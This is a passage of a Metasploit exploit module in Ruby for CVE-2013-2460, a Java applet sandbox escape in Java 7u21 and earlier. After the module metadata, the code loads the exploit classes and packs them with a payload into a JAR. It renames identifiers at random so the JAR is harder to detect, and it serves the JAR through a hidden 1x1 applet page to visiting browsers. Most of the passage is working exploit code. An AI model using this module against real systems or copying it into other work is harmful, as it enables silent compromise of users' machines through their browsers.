    super( update_info( info,
      'Name'           => 'Java Applet ProviderSkeleton Insecure Invoke Method',
      'Description'    => %q{
        This module abuses the insecure invoke() method of the ProviderSkeleton class that allows
        to call arbitrary static methods with user supplied arguments. The vulnerability affects
        Java version 7u21 and earlier.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Adam Gowdiak',   # Vulnerability discovery according to Oracle's advisory and also POC
          'Matthias Kaiser' # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2013-2460' ],
          [ 'OSVDB', '94346' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'],
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ],
          [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ],
          [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ]
        ],
      'Platform'       => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 18 2013'
    ))
  end

  def randomize_identifier_in_jar(jar, identifier)
    identifier_str = rand_text_alpha(identifier.length)
    jar.entries.each { |entry|
      entry.name.gsub!(identifier, identifier_str)
      entry.data = entry.data.gsub(identifier, identifier_str)
    }
  end

  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class")
    @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class")
    @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length)
    @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name)
    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      jar.add_file("#{@exploit_class_name}.class", @exploit_class)
      jar.add_file("ExpProvider.class", @provider_class)
      jar.add_file("DisableSecurityManagerAction.class", @action_class)
      randomize_identifier_in_jar(jar, "metasploit")
      randomize_identifier_in_jar(jar, "payload")
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end

      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  def generate_html
    html = %Q|
<html>
<body>
<applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
</body>
</html>
|
    return html
  end

end